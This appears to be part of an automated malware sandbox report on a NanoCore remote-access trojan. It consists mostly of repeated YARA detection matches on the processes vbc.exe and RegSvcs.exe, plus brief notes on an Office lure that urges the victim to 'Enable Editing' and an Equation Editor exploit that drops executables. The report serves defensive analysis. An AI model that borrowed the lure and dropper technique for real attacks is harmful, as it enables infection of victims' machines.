Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692216842.0000000003971000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 9.2.RegSvcs.exe.d30000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.dd0000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d40000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2796198.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.da0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.a00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.da0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.800000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.a00000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.dd0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2390000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2390000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.740000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.398b838.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.c90000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.398b838.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.d90000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.27a23d8.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.4784c9f.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.4780000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.6e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.c90000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.478e8a4.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.4780000.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.3977641.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.3981e88.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2796198.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.vbc.exe.37369e8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.27a23d8.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.RegSvcs.exe.2791340.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.691051857.0000000000D30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.692419310.0000000004780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690266961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.691167896.0000000000E30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690789448.0000000000800000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691355428.0000000002390000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 17 t I yellow bar above 18 4 This document is 19 N " ? T : ? protected
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exeJump to dropped file
Source: 9.2.RegSvcs.exe.d30000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d30000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.dd0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.dd0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d40000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d40000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.2796198.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2796198.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.da0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.da0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.a00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.a00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.da0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.da0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.800000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.800000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.a00000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.a00000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.dd0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.dd0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.2390000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2390000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.2390000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2390000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.740000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.740000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.398b838.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.398b838.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.c90000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.c90000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
